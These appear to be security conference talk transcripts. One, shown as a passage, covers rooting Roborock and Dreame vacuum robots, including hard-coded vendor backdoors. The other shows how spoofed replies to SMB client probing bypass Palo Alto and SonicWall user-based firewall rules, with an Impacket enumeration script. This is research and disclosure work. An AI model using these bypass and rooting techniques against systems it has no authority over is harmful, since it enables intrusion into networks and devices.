And now hopefully the bash script is executed. We can check it with getenforce, and we see it's permissive, so SELinux is now disabled. Let's do level three. We now have full root access; however, it's only temporary, so the moment we restart the vacuum cleaner we lose root access. The good thing is the app partition is not integrity protected. If we modify information there, we don't have any issue. By modifying a few scripts we can disable SELinux and start Dropbear on a different port. The reason why we want to start Dropbear on a different port is that iptables still blocks port 22. As I mentioned before, Roborock modified the iptables binary so that we cannot delete rules, but we can just use a different port instead. We are still limited by the ELF binary signature verification. However, we found a backdoor in this function: if you give the binary a particular name, then it is whitelisted. We can even point symbolic links to this binary. Many thanks again to Eric Ullman at this point, who helped me figure that out. Let's do the demo again. I want to run Valetudo on my robot. Valetudo is a cloud replacement which allows you to control your vacuum robot locally. As you can see here, I downloaded it with wget into a temporary directory and tried to launch it. However, I got a segmentation fault. Typically segmentation faults happen if some libraries are broken. However, when I was looking at the kernel log, I saw that the ELF verification function kicked in and stopped the execution. Now let's try the trick with the whitelist. We renamed the Valetudo binary to the whitelisted name. As soon as we run the whitelisted name, you see Valetudo starts happily and everything works. Now we have full root access and can run our own binaries on the system. Some other ideas for this vacuum cleaner: we can ask OP-TEE nicely to decrypt firmware updates for us. As we have root access on the securely booted system, OP-TEE will happily decrypt firmware updates for us. Also, we can access the cameras directly. For people who understand how TensorFlow Lite works, you can take a look at the machine learning models of the vacuum cleaner. I myself have no idea how this works, so I didn't take a look at it. And we can also take a look at other backdoors: there are some hidden functions which are just waiting to be explored. So as a summary about Roborock: we have an easy method to root the S7 vacuum cleaner and some other models. We also have a rooting method for the M1S and MaxV. However, this method is dangerous and will likely brick your device. It's mostly only feasible if you have the equipment and experience. So regard this root as a proof of concept that the technique can root these devices; however, I don't think that it will be useful for a lot of people. As a general recommendation at this point, I would say that we should try to avoid new Roborock models if you want to have root. Part of the reason is that they lock down their systems, and the other reason is that due to the weaker hardware we will run into resource issues if we try to run custom software on them. All right, so we need a new alternative, and the great thing is there's a new player in the field of vacuum cleaners, which is Dreame. Dreame is a great alternative for us. They released their first model back in 2019 and they also produce OEM products for Xiaomi. They have four different kinds of vacuum cleaners which they produce.
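Just to sketch what accessing the cameras directly can look like once you have root: a few lines of Video4Linux2 code are enough to ask the sensor what it exposes. The device node /dev/video0 is only an assumption here; the actual nodes and formats vary per robot.

    #include <fcntl.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/ioctl.h>
    #include <unistd.h>
    #include <linux/videodev2.h>

    int main(void) {
        // Assumption: the robot exposes its cameras as V4L2 devices such as /dev/video0.
        int fd = open("/dev/video0", O_RDWR);
        if (fd < 0) { perror("open"); return 1; }

        struct v4l2_capability cap;
        memset(&cap, 0, sizeof(cap));
        if (ioctl(fd, VIDIOC_QUERYCAP, &cap) == 0)
            printf("driver=%s card=%s caps=0x%08x\n", cap.driver, cap.card, cap.capabilities);

        // List the pixel formats the sensor offers.
        struct v4l2_fmtdesc fmt;
        memset(&fmt, 0, sizeof(fmt));
        fmt.type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
        while (ioctl(fd, VIDIOC_ENUM_FMT, &fmt) == 0) {
            printf("format %u: %s\n", fmt.index, fmt.description);
            fmt.index++;
        }
        close(fd);
        return 0;
    }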
The Xiaomi 1C and the Dreame F9 are vSLAM-based models, so they have a camera which is looking at the ceiling, and they create the map with it. The Dreame D9 has a more traditional LiDAR sensor, similar to the Roborock devices. The Xiaomi 1T has vSLAM and a time-of-flight camera, so it can scan objects which are in front of it. And the current flagship model is the Dreame L10 Pro, which has LiDAR, a line laser and a camera. All of these devices are based on various Allwinner SoCs. Dreame uses a custom Android for their devices, which is mostly based on the Tina Linux provided by Allwinner. The company developed their own robotics software, which is called Ava. So let's take a quick look at what kind of sensors you can access on these devices. These pictures were recorded on rooted vacuum cleaners. As you can see here, there's a camera which is looking at the ceiling, and if you root the device you are able to access these cameras. The Xiaomi 1T has an additional camera in the front, which is a time-of-flight camera. With that you get a point cloud of the objects which are in front of the vacuum cleaner. The Dreame L10 Pro uses line lasers to detect objects in front of it. As you can see on the right, the device creates two laser beams, and if there's any object in front of the device the laser beam gets distorted. The camera will pick up the distortion and determine how far away the object is. So let's talk about how we can root Dreame. The rooting of the devices is surprisingly easy. I bought my first Dreame robot when I was in China back in 2019, and it took me only a couple of days to root the device. The good thing is that all the devices have the same debug connector, which can be accessed without breaking any warranty seals. I did a lot of reverse engineering and I was able to extract the key material and firmware. I also reverse engineered ways to create proper FEL images. With the help of the Banana Pi tools, which also target Allwinner SoCs, I was able to create images which you can use to flash the devices. To flash the device you unfortunately need to use a Windows-only software, Phoenix USB. There might also be ways to flash it from Linux, but I didn't investigate that. So what does this debug interface look like? The debug interface has two times eight pins and it has a pitch of two millimeters. The two millimeters are way smaller than the typical jumper wires which you get. If you plan to connect to it with wires, then make sure that you connect to the right pins. The debug interface gives us a couple of interesting interfaces. For example, we have USB, we have UART and we have the boot selection pin. I saw that there's also another UART there and likely JTAG, but I didn't investigate further. To easily root the device we created custom PCBs which enable you to easily access the USB and UART. There's a simple version which just gives you USB and the UART headers, and there's an advanced version which has an on-board serial controller. At this point I want to thank Ben Halfrich, who created these boards in KiCad, and at the bottom of the slides you find a link to the Gerber files. Here are some examples of how you can connect them. For the PCB, you can just insert it; you just have to make sure that you have the right orientation so that you don't fry the board, and then you can just connect USB and UART.
If you don't have this board you can also use jumper wires, but you need to be a little bit more careful and make sure that the connection is done properly. At the bottom there's a diagram of how you need to connect everything. Let's talk about some interesting findings which I saw when I reverse engineered the Dreame firmware. All the devices have an autossh backdoor. This can be triggered from the cloud. What it will do is create a reverse SSH tunnel to one of Dreame's servers. The interesting thing here is that they hard-coded the credentials for the server, which is public facing. The bigger problem is that the user which is used to create this reverse SSH tunnel has sudo rights on that server, and it appears the server is used for development. I don't really know why they did that, but this seems like a really, really bad idea. A scary thing which I found were the startup debug scripts. These scripts were downloaded over FTP from some developer's personal NAS. These scripts are also executed at boot-up on some devices. The same debug scripts also upload log files onto that NAS, and the admin credentials are in plain text in that script. All of the vacuum cleaners have predictable root passwords. For devices with production firmware, you can compute the root password from the serial number. For devices with debug firmware, there's only one valid password. So knowing that, it might be a bad idea to connect your vacuum cleaner directly to the internet. I also found a lot of chatty functions. The cloud interface allows the execution of some debug functions. For example, someone can trigger the recording and upload of pictures, or the recording and upload of camera footage for devices with cameras. And the device also produces a lot of log files. The only way to prevent these uploads is basically rooting. I don't know if these functions are used on a regular basis by the developers, but the fact that these functions exist is kind of scary. As a summary about Dreame: the devices are cheaper than Roborock and they also have performant hardware. This makes the devices the perfect target for rooting. As I have been working on the rooting for quite some time already, I was able to work with the developer on support for these devices. So I'm happy to announce that all Dreame devices so far have been fully supported by Valetudo since April 2021. All current models can be rooted without any soldering, and this also applies to all devices released before August 2021. There will be some devices in the future; we don't know yet if they are rootable or not, but we will figure it out very soon. The Dustbuilder is a website to build your own custom robot firmware. You can create reproducible builds. It's easy to use, especially for Windows users. In the past, we had a lot of trouble with Windows and Mac users where building firmware was kind of tricky, so this tool makes it way easier. The Dustbuilder works for Dreame, Roborock and Viomi devices and is a perfect alternative to local building. However, if you don't trust it, the tools will still be published on GitHub. You find the Dustbuilder at builder.dontvacuum.me. At the end, I want to thank a few people who supported me in doing this presentation and the research. I want to thank Ben Halfrich, Carolyn Gross, Cameron Kennedy, Daniel Wegemer, Eric Ullman, Guevara Noubir and Sören Beye. If you have any questions, feel free to contact me by email, Telegram or Twitter. Visit my website for any additional information, or meet me here at DEF CON if you're around.
If you happen to have a Dreame robot or plan to get a Dreame robot, I have a couple of spare PCBs with me which you can pick up for free. Thank you very much and have a nice con.
|
Vacuum robots are becoming increasingly popular and affordable as their technology grows ever more advanced, including sensors like lasers and cameras. It is easy to imagine interesting new projects to exploit these capabilities. However, all of them rely on sending data to the cloud. Do you trust the companies promise that no video streams are uploaded to the cloud and that your personal data is safe? Why not collect the dust with open-source software? I previously showed ways to root robots such as Roborock and Xiaomi, which enabled owners to use their devices safely with open-source home automation. In response, vendors began locking down their devices with technologies like Secure Boot, SELinux, LUKS encrypted partitions and custom crypto that prevents gaining control over our own devices. This talk will update my newest methods for rooting these devices. The market of vacuum robots expanded in the past 2 years. In particular, the Dreame company has recently released many models with interesting hardware, like ToF cameras and line lasers. This can be a nice alternative for rooting. I will show easy ways to get root access on these devices and bypass all security. I will also discuss backdoors and security issues I discovered from analysis. You will be surprised what the developers left in the firmware. REFERENCES: Unleash your smart-home devices: Vacuum Cleaning Robot Hacking (34C3) https://dontvacuum.me/talks/34c3-2017/34c3.html Having fun with IoT: Reverse Engineering and Hacking of Xiaomi IoT Devices https://dontvacuum.me/talks/DEFCON26/DEFCON26-Having_fun_with_IoT-Xiaomi.html https://linux-sunxi.org/Main_Page
|
10.5446/54188 (DOI)
|
Hi and welcome to my talk: Hi, I'm DOMAIN\Steve, please let me access VLAN 2. It's about tricking firewalls, using their own capabilities, into applying security policies to arbitrary IPs on the network. My name is Justin Perdok. I'm a pentester at CyberDefense. I enjoy drinking a coffee or a beer and long mornings in my free time. As you might imagine, I'm into hacking stuff, but also automating stuff. If you ever want to reach me, you can contact me on Twitter. Today, we're going to talk about a feature in firewalls that allows me to apply security policies to my IP. To start off, we're going to talk about an assessment where I initially discovered this was a thing that firewalls do. Then, I'm going to shortly cover how traditional network segmentation is implemented and how the feature is implemented by the vendor. Then, I'm going to cover how I built a tool that allows me to respond to these requests and how I was able to pwn two different firewall vendors. Lastly, we're going to close off the talk by speaking about additional research and some conclusions and takeaways from this research. To start off, let me tell you about a day in the life of a pentester. I was on an internal project with my colleague Thijs, working towards getting domain admin access within the network. You know, I'm doing my thing. At some point, we wanted to move some files around between a host and our workstation within the network. The easiest way to do this, I thought, was to spin up an SMB server using Impacket's implementation. While doing so, out of nowhere, someone tried to authenticate to me. The username included something that looked like a Palo Alto User-ID account. While it was authenticating to me, the Impacket SMB server threw some errors referring to an unsupported DCERPC opnum. Besides that, it wasn't a one-off thing; the user kept authenticating to me over and over and over. You know, honestly, when this happens, you start to relay the credentials. Luckily for me, when I looked at my BloodHound data, this user was also a domain admin. You relay stuff, you pwn some hosts, get credentials on those, do your thing, and before you know it, the job's done, right? Well, yes, but actually no. I wanted to figure out what was actually going on under the hood. I started googling a bit, using the username as a reference, and I figured out it was a feature that allows firewalls to probe clients on the network and gather information about logged-on users. So I verified this with the client: do you indeed use this feature? And they told me: yes, we do, we use it to apply security policies in the network. I googled around a bit more, and I figured out most of the articles that describe this feature from the vendor side of things mostly talk about it being SMB based and that it authenticates to you. They didn't look at it any further to see how you could potentially return information, for example. So I started to look into it a bit more. First off, I started to look at a packet capture of the process that authenticated to me. What I saw is that the client that was probing me connected to the IPC$ share. From there it requested a pipe called wkssvc and then executed a function called NetWkstaUserEnum, which at the time I presumed was a request to collect information about logged-on users. To fully understand what's going on here, I want to step back and talk about how named pipes are implemented within Windows. So in Windows there are these three default administrative shares. The first one is the C$ share.
This share basically gives rights to the entire disk. Depending on how many disks you have in your system, you would have multiple of these shares, corresponding with the drive letter associated with each drive. Besides that, there's also the ADMIN$ share. The ADMIN$ share basically gives access to the Windows folder on the installation disk. And besides that, there's also a special share called the IPC$ share. IPC stands for inter-process communication. The share itself does not give access to files, but it actually gives access to processes running on the system. It gives access to these processes by exposing them through named pipes. So let's look at an example here. Here we have Bob, Bob the named pipe, and it's giving access to build.exe by exposing it on the IPC$ share. This means if you want to read and write data to build.exe, you would do this by talking to Bob. You can also ask Bob to execute specific functions in build.exe. Executing functions this way is often referred to as Distributed Computing Environment / Remote Procedure Calls, or DCERPC for short. So we just learned that this process connects to you on the IPC$ share and tries to collect information about logged-on users. This is pretty much the same thing that I saw on the assessment: something was authenticating to me and trying to enumerate logged-on users. To understand why this could be an interesting attack vector, let's first take a step back and look at traditional network segmentation. We'll cover how this is traditionally implemented and why this just gets hard and complicated over time. Then we'll also show how an alternative solution could help with this. I would like to note that this won't be a comprehensive guide on VLANs themselves or networking; it should just be enough to get a basic understanding of how VLANs work. So here is an example of a new network, presumably from a new company. Here everything is connected to the same switch and everything can talk to each other, because this is a flat network. Then the company has a pentester come along and perform an assessment. You know, you pwn some hosts, and presumably when writing the report you would recommend implementing some form of network segmentation. So the client starts to think about this and they get the idea to implement some form of zones, in this example a blue client zone and a yellow server zone. The idea here is to not allow traffic to flow freely between the zones and to restrict it by default. To do this, the client would presumably use VLANs. So you know, how would these VLANs work? So let's take these four ports, configured with two different colors, a blue color and a yellow color. Basically, the blue color represents VLAN ID 2 and the yellow color represents VLAN ID 1. Whenever a device is connected to a blue port, it will only allow traffic to flow to other ports which are also blue. Meaning if we were to connect four physical devices to the same switch, they will only be able to see and talk to each other if the colors correspond. Configuring ports this way is also referred to as untagged ports. But you know, a switch doesn't actually use colors, so how does it do this under the hood? Well, whenever an Ethernet frame passes through a switch port which is configured with a specific VLAN ID, it will edit this Ethernet frame to include an extra header: the 802.1Q header, also referred to as the VLAN tag.
Which means whenever the Ethernet frame passes through, the corresponding VLAN ID is added to the Ethernet frame. The switch will then ensure that traffic with a specific VLAN ID is only able to reach other ports which have this corresponding VLAN ID. This isn't all the switch can do, though. The switch can also be configured using a different type of port, called tagged or trunk ports. So let's take another example with two switches. Here we have the same VLANs, the blue one and the yellow one. Let's say we have a device connected to switch one on the blue VLAN and it wants to talk to a device on switch two, also on the blue VLAN. To do this, we configure a port on each switch as a trunk port. What this does is allow the traffic from the corresponding VLANs to flow between the switches, but it won't allow the blue VLAN to reach the yellow VLAN, even though it's passing over the same port. Having all these devices segmented from each other is great for security, but not so much for productivity. You can use a device such as a firewall to allow controlled access between these zones. For example, you can tell the firewall to allow clients from the blue zone to reach the servers in the yellow zone on a specific port. This is the very basic concept of network segmentation using VLANs, and it's pretty easy to understand within such a small network. But companies usually don't have one or two VLANs, they have many. And after the basic rules are initially set up, they grow over time, and before you know it there's a whole bunch of rules, nobody knows what's going on anymore, everything is on fire and everybody is screaming. So this is where the alternative solution comes in, one of these solutions being Palo Alto User-ID, a firewall SSO solution, as you might call it. Basically, Palo Alto User-ID creates a user-to-IP mapping, and this user-to-IP mapping gives you visibility within the network into which user is doing what, and allows you to create firewall rules for specific users. Palo Alto User-ID can be configured to collect information from multiple sources, for example Active Directory authentication logs, syslog servers, and the one we're going to talk about today: client probing. So by using this SSO feature, instead of relying on traditional ways of segmentation, you could say a specific user in the blue VLAN is allowed to access a specific server within the yellow VLAN. Even though there are other users within the blue VLAN, they're not able to access the server in the yellow VLAN, because the almighty firewall figures out who is logged on to which client and then dynamically applies firewall rules to that specific IP. So after finding out this was a thing, I had two trains of thought. The first was: you know, this is awesome. The other was my inner hacker talking in the back of my mind: wait, what? We're going to trust clients to return truthful responses and base our segmentation around that? Seems like a bad idea. So to explain why I thought it was a bad idea, let's use an analogy. In this analogy, I'm staying in a hotel, and this hotel has a VIP membership which you can buy into to gain extra perks within the hotel. Being the cheapskate Dutch boy that I am, I decided not to buy into this VIP system.
So naturally, the first thing you do when you arrive at a hotel is visit the bar, right? When arriving at the bar, I notice there are two fridges of beer: one fridge with what I would call less desirable beers, and one fridge with the good ones. The only problem is that the fridge with the good ones has a sign on it which says VIP members only. Even though it says VIP only, I still want the good ones. So I walk up to the bartender and ask if I can access the VIP fridge. The bartender is going to look at his rulebook, and he sees that only VIP members are allowed to access this fridge. Then he's going to look at his user-to-hotel-room system and sees that he doesn't know who is currently residing in my room. So he's going to ask me: who are you? Being the honest, law-abiding citizen that I am, I just respond truthfully and tell him that I'm Justin. The bartender then looks at his rulebook again, at the list of VIP members, and of course I'm not on the list. He tells me: no, you're not allowed to access this fridge. But instead of giving up, because I still want one of the good beers, I start to look around the room, and I see there's a guy over there in the corner named Steve drinking one of the good beers. So I get this genius idea: instead of saying who I am, let's lie about who I actually am. So I walk up to the bartender again asking to access the fridge, this time using a different hotel room number. The bartender again looks at his rulebook: only VIP members are allowed to access the fridge. He then looks at his user-to-hotel-room system and sees he doesn't know who's currently residing in that room. So he's going to ask me: who are you? This time, instead of saying I'm Justin, I lie and tell him that my name is Steve. He takes this information, looks at his rulebook and sees: hey, Steve is a VIP member, of course you can access the fridge. So, seems like a plausible attack, right? The User-ID feature might not expect us to return false information, and this potentially allows us to access things we aren't allowed to. As for figuring out who you want to impersonate: instead of looking around the bar, you could look at Active Directory data gathered with BloodHound and figure out there's a specific group in Active Directory which references firewall ACLs. The idea of the attack scenario here is basically the same as with a web application: whenever a web application just trusts client input without validating it, you're usually able to break things within the web app. But the thing is, we don't know this for certain. The User-ID system might try to validate or cross-reference the information collected from client probing with other sources, such as Active Directory authentication logs. But we can try to figure it out by looking at how the solution is supposed to be implemented. So let's start with what we know for certain: the firewall ACL. Besides traditional VLAN and IP address based filtering, you can also add an extra source option within this ACL, this extra source option being either a user or an Active Directory group. In this case, the firewall only allows members of the VIP group to access a specific fridge within another VLAN. When implementing client probing, you can either use SMB or WMI. The firewall itself only supports probing over WMI, but there's also an agent which supports both.
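To give a feel for what the SMB-based probe amounts to on the wire, it is essentially the same logged-on-user enumeration that offensive tooling already does: connect to IPC$, bind the wkssvc pipe, and call NetrWkstaUserEnum. The sketch below is my own illustration using Impacket's wkst module, not anything from the vendor; the target address and credentials are placeholders, and helper signatures may vary slightly between Impacket versions.

```python
# Hedged sketch: enumerate logged-on users the way an SMB-probing agent would,
# by binding the wkssvc named pipe over SMB and calling NetrWkstaUserEnum.
# The target and credentials below are made-up placeholders.
from impacket.dcerpc.v5 import transport, wkst

def enum_logged_on(target, username, password, domain=''):
    # SMB transport to IPC$ exposing the \wkssvc pipe
    rpctransport = transport.SMBTransport(target, filename=r'\wkssvc',
                                          username=username, password=password,
                                          domain=domain)
    dce = rpctransport.get_dce_rpc()
    dce.connect()
    dce.bind(wkst.MSRPC_UUID_WKST)             # Workstation Service interface
    resp = wkst.hNetrWkstaUserEnum(dce, 1)     # info level 1: user + logon domain
    entries = resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']
    # String fields are NULL-terminated, hence the [:-1]
    return [(e['wkui1_logon_domain'][:-1], e['wkui1_username'][:-1]) for e in entries]

if __name__ == '__main__':
    for dom, user in enum_logged_on('192.0.2.10', 'svc_userid', 'Spring2021!'):
        print(f'{dom}\\{user}')
```

Seen from the probed host, this is exactly the IPC$ connection, wkssvc open and opnum call that showed up in the packet capture earlier.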
Since our presumed attack method relies on SMB, we're going to talk only about the agent today. The agent itself needs to be installed on a system somewhere within the network, and from that place it needs to be able to reach the sources it tries to collect data from. So for our test case, we're going to use a very simple network design. Everything here is connected to the same VLAN, except for the segmented fridge. This, of course, is not a typical corporate network design, but it will do for our demonstration purposes. The Palo Alto User-ID agent is then installed somewhere within VLAN 1, since from there it's able to access the clients as well as the Active Directory domain controller. Even though it's called the User-ID agent, it's not installed on every host within the network; it needs to be installed on a host which is able to connect to the different sources. You can, however, use multiple agents if you want to, but doing so depends on your network design and the limitations of the software. Now that we understand our network design, let's look at how you would install the agent. When installing the Palo Alto User-ID agent software, you're prompted for a service account. If you were to use a plain standard Active Directory user as the service account, it would error out, because the minimum required right is the "log on as a service" user rights assignment. Then, depending on the collection method you want to use, you add additional rights to this account. Reading the vendor documentation, they actually properly explain how to implement least privilege, except they sadly don't do so for SMB-based client probing. Meaning that when this stuff is implemented, you and I both know the account usually ends up over-privileged, with either local admin or in some cases even domain admin privileges. In the case that you're using SMB-based probing, the overall security also heavily depends on other factors within the network, for example network access control or general system hardening that would prevent SMB relaying. And Palo Alto even knows this: there are multiple places within the documentation referencing client probing that advise you not to use it. Anyhow, after having set up the appropriate rights for the user, you can start to configure the agent. When doing so, you very quickly figure out that you don't need to do much. Both the server collection method and client probing are enabled by default, for both WMI and SMB. And I think this is an important one to note, because Palo Alto by default recommends against doing this, yet it's enabled by default within the agent. So if an administrator just keeps the defaults, he might unknowingly implement a system that is going to spray hashes everywhere in the network. Now, the only thing you need to do before the agent starts collecting information from servers or starts probing clients is to add a server source, in this example a domain controller. This is all that is required to make the agent start probing and collecting information, but it has another function I would like to cover, called caching. Whenever the agent identifies a user-to-IP match, it will not only forward this information to the firewall, but also store it locally for a specific amount of time. By default this time is 45 minutes.
However, this caching timeout does not correlate to the probing interval, meaning that even if the collected information was obtained by probing and has been cached for 45 minutes, the system will still probe the clients regardless of this caching timeout. Now that we've covered the configuration of the agent itself, we can look at the firewall. The first thing we do is simply add the agent to the firewall. This enables the firewall to talk to the agent whenever a specific ACL triggers the need to collect information about a user. Then you enable user identification on the zones where you want to configure these ACLs. Then, to allow the firewall to know about the users within your server environment, you add an LDAP profile. This LDAP profile basically links Active Directory to the firewall. From this point onwards, you're able to create firewall rules using users as a source. But if you also want to use groups, you need to do an additional step, this step being a group mapping. Basically, this takes the groups within your Active Directory environment and caches their members on the firewall itself, so it doesn't need to perform an LDAP query every time a user matches an ACL. Then, from this point forward, whenever you create an ACL on the firewall and generate some traffic matching these rules, the firewall will send a request over to the agent asking who's logged on, and if the agent doesn't know, it will start probing us. In this example we can see an Ubuntu client performing a ping towards the fridge, and you can see the agent starts probing us. So as we now know, instead of three components there are actually four components in this flow: there's the client in VLAN 1, the User-ID agent, the firewall, and the fridge we want to access. Regardless of what we do, the agent is going to collect information from Active Directory and store this information to build out its user-to-IP mapping cache. Then we come along and ask the firewall to access the specific fridge in a segmented VLAN. The firewall is going to block our traffic: hold up, I need to know who you are, because there's a user-based ACL here. The firewall then sends an information request to the agent. The agent looks at its cache to see if it knows who we currently are, and because it doesn't, it sends a probing request to us asking: who are you? The only issue right now is that we currently don't support this. So whenever a request comes in, we throw an error like: lol, what? Unsupported DCE/RPC. So at this point I thought: maybe if I implement NetrWkstaUserEnum, nobody will be able to tell I'm not the real Spider-Man. But before going off and building something, I first wanted to know what is actually happening under the hood. So we're going to look at some Microsoft documentation and figure it out from there. Again, if we look at a packet capture of the probe, we see that the probing request tried to access a named pipe called wkssvc. With a bit of googling around, you can easily figure out that this is actually the Workstation Service Remote Protocol. Luckily for us, Microsoft has this huge, handy PDF which fully explains everything within this named pipe. So when I actually wanted to build something around this, I was kind of dreading having to build it from scratch.
So after asking around internally on our Mattermost, I was redirected back to Impacket, which in hindsight was actually pretty obvious, because the README references the specific named pipe we want to implement. When it came down to actually implementing the NetrWkstaUserEnum function, most of the work was already done for me: all the structures for the function to work properly were already implemented in Impacket as Python classes. Here on the left you can see a simplified version of the request as Microsoft describes it, and on the right you can see the class within the Impacket source. All I had to do was figure out how to implement some code which triggers on this request and returns information the way I want it to. But before I started extending Impacket, I wanted an easy way to verify what my code was doing. With a bit of googling, I found a function called Get-NetLoggedon, written by harmj0y. This function basically does the same thing the firewall would do, which allows us to test our code without having to rely on a firewall. With the firewall temporarily out of the way, I could start implementing things within Impacket. I won't bore you with every single line of code that I added, but I would like to share a couple of things I found out which might be handy if you ever want to implement something similar. The first thing: currently, whenever Impacket sees a probing request, it has no idea how to handle it. So in order for Impacket to support this, we add a dictionary within the class which links this opnum code to a method we define later. This way, whenever Impacket sees a specific opnum code, it knows which method should handle the request. The next one is that you shouldn't add arguments to the SMBServer class itself if you want to supply it with command-line argument information. To get this information to the method you're going to use, you define a function which updates the configuration, and within the class itself you can then use a dictionary lookup to get back the information you initially supplied as SMB server arguments. As you can see here, the values that are initially supplied as SMB server arguments are the values used to return the actual information upon a request. So let's look at this in action. Here on the top we can see a PowerShell session with the Get-NetLoggedon function loaded, and on the bottom we can see an Ubuntu client with our modified version of Impacket. Whenever we send a Get-NetLoggedon request to the Ubuntu client, you can see that the information which was supplied to the SMB server is returned in the response. Meaning that we're now able to fully respond to these probing requests. So the issue of us not supporting the request is now gone: we return the spoofed user information. The agent then takes this information and adds it to its cache, and afterwards forwards it to the firewall. The firewall then uses the information and either gives us access to the fridge or not, depending on the information we supplied. Which is great: everything is in place for this attack. So let's take this and apply it to the real thing. Here you can see a firewall configured with a user ACL. It says that only VIP members within VLAN 1 are able to access the fridge in VLAN 2. Then here on the right you can see the Active Directory console with the specific user group.
And on the left you can see an Ubuntu client, which we'll cover more shortly. If you open the VLAN-VIP members group, you can see that the user Steve is a member of this group. Then, if we look at the Palo Alto User-ID agent, here we can see the current user-to-IP mapping cache. To show you that I'm not cheating, here on the left we can see that the Ubuntu client has one IP address and that it currently isn't listed within the user-to-IP mapping cache. Then we start to generate some network traffic matching the firewall rule, and you can see we're not able to access this specific fridge. Here we can see the agent again, and now we see a request from the firewall to get information about us. The agent doesn't know, so it adds us to the probing queue. Meaning that if we start our own SMB server which is able to respond to these requests, we can return our spoofed user. So after starting our server, we just have to wait a while for the agent to probe us. And when it eventually does, you can see that we just returned domain\steve as our logged-on user. You can then see that this information is added to the user-to-IP mapping cache, and on the bottom left you can see our ping now being allowed through to the fridge. So if we switch over to the browser again, here we can see all the beers we want to access. Safe to say that we just succeeded in bypassing a firewall ACL. If you want to play around with this stuff, the code is on GitHub; the QR codes are on screen, so scan them and have fun. As this was just one of the firewall vendors, I started looking around a bit more, because there might be more out there. After googling around, I figured out that most firewall vendors have some form of user-to-IP mapping function, but not all of them use SMB as their probing method. I did find one called SonicWall, and they reference something called NetAPI. After looking into it, SonicWall's solution is basically much the same as Palo Alto User-ID: it's an agent which is installed on the network, and it starts collecting information from Active Directory or, you know, client probing. The only main difference is that SonicWall's documentation is scattered all around. Depending on which document you happen to open, you're either told to use least privilege or you're told to just use administrative rights. Apart from that, there isn't much else going on, so we can jump right into the demo. Here we can see the SonicWall SSO agent being configured to start probing clients using NetAPI, and if we switch over to the firewall, we can see there's clearly a rule which says that if we want to access Google, we need to be a specific user, in this case administrator. Then if we start generating traffic, you can see we clearly aren't allowed to access this resource. If we then look at our SMB implementation, you can see that we supplied the username administrator and the corresponding domain. After starting this service, we just have to wait a while for the agent to start probing us. And when it does, you can see that by returning the right information, we're allowed through this firewall ACL. So I just showed you how to pwn two different vendors using arbitrary spoofed user information, but there is a caveat I've neglected to mention so far. This caveat covers how SMB guest access works with Impacket and Windows.
So whenever an Impacket SMB server is started without any form of authentication, whenever authentication fails it will fall back to an SMB guest session. Meaning that the probing requests thus far have made use of an SMB session with guest access enabled. The issue here is that this shouldn't be possible by default in recent versions of Microsoft Windows: by default there should now be a registry key which prevents the client from accepting an SMB server session with guest access enabled. But up to this point, we haven't had any problems with this. As it turns out, even though Microsoft says this registry key should exist by default as of a specific version of Windows, it clearly doesn't exist on Windows 10 clients. However, it does exist on Server 2019. Meaning that if you were to install this agent on a Server 2019 machine, this exploit wouldn't work. If it's installed on a Windows 10 client, I would recommend you check whether this registry key exists and, if not, enable it. So let's cover the disclosures. I started my first disclosure with Palo Alto and shared two findings: the SMB hash disclosure and the actual bypass of firewall ACLs. I was then informed that NetBIOS-based client probing would be dropped from future versions of Palo Alto User-ID. I was also informed at some point that this issue would not warrant a CVE, because it was an issue with the Microsoft protocol itself and not with Palo Alto. After being told that, I was added to the Hall of Fame. I currently don't know the status of the dropping of NetBIOS probing; the latest response from the vendor was that the fix is already present in the product, because the client doesn't need to use this feature. Then we can cover the SonicWall disclosure. I started that disclosure at the same time, and after a while they informed me that the issue was actually a duplicate. Besides that, they told me they would add a warning whenever the user administrator was used. In my head I thought that was kind of a dumb fix, because you're just going to take an if statement, smack it on the issue and call it a day. So naturally I shared my concerns with the vendor, and I asked them which of my vulnerabilities was a duplicate of the other researcher's. After some time I received an email which informed me of the CVE number they had released for the issues. Looking at the vendor's disclosure, I figured out who the other researcher was. I then sent him a message asking basically what he had disclosed to SonicWall. After talking to him, I figured out that he didn't perform any ACL bypasses; he disclosed the SMB hash disclosure part. Meaning that SonicWall just took both of our findings, tacked mine onto his, and called it a day. Anyhow, regardless of that, I still wanted to figure out whether they implemented any other fixes besides the if statement checking for the user administrator. So I installed the agent, and I did find out a couple of things. The if statement is there, but it only checks whether the username is literally called administrator; it doesn't check the effective rights of the user. Meaning that if you were to create a different user and give it domain admin rights, it will not prompt the warning. Besides that, this warning only prompts when you configure the service account at a later stage, not during the initial installation when it's first set. They also changed the default probing method: before the disclosure this was NetAPI, afterwards it changed over to WMI.
They also updated the documentation: they now state that you should use a local administrator when you want to use NetAPI-based probing. So, what's next for this research? There is potentially a vendor three; I expect them to also be vulnerable. Their implementation is slightly different from what we talked about today, but I think they're vulnerable, so I've already started a disclosure process with them. Besides that, I did notice there were a couple of vendors which use the winreg named pipe. This winreg named pipe gives access to the Windows registry, and they basically perform a check against the registry to enumerate the logged-on users. It would require some further research, but I think this is also vulnerable to the same thing we talked about today. Also, there were a lot of vendors which use WMI to perform the probing requests. Currently there are no open source implementations for setting up your own WMI server, so if we're able to implement this within some open source tool, we might be able to break a lot of the firewall vendors. Apart from implementing new protocols and that kind of stuff, we might also be able to abuse the caching function of the agents. Let's imagine someone working within a corporation who leaves for home at five o'clock. We might be able to reuse his IP address by assigning it to ourselves, and hopefully that IP is still in the user-to-IP mapping cache. Other than that: we talked about firewalls today, but there might be other products out there which use a similar technique. Even if you'd expect them to use WMI rather than SMB for probing, it wouldn't surprise me if they also supported an SMB-based probing method. And using the same idea we talked about today, you might be able to trick that vendor or product into doing something unexpected by returning arbitrary information. So, the conclusion and takeaways. The first one: why I think client probing is generally a bad idea. Besides the whole password spraying and hash disclosure part of SMB-based probing, I think that client probing in general is a bad idea. Regardless of the protocol used, you're never sure whether the endpoint you're talking to is returning arbitrary or spoofed information, and basing the logic of a product around that, for example for applying security rules, is in my mind a bad idea. As of today this can be exploited with the Impacket implementation I built, but it wouldn't surprise me if you could kill the existing service within Windows, spin up your own, and exploit this natively within Windows. Another big one: just because a vendor supports a specific feature does not mean that feature is secure by default. In both cases, the vendors we looked at today supported a method which is generally known to be insecure, and in both cases it was enabled by default. You really need to practice due diligence when it comes to these extra features: look at how they're implemented and ask yourself the what-if questions. What if someone is able to respond to these requests? Is it actually safe, and a smart idea, to base our rules around this? So, thanks for listening to me 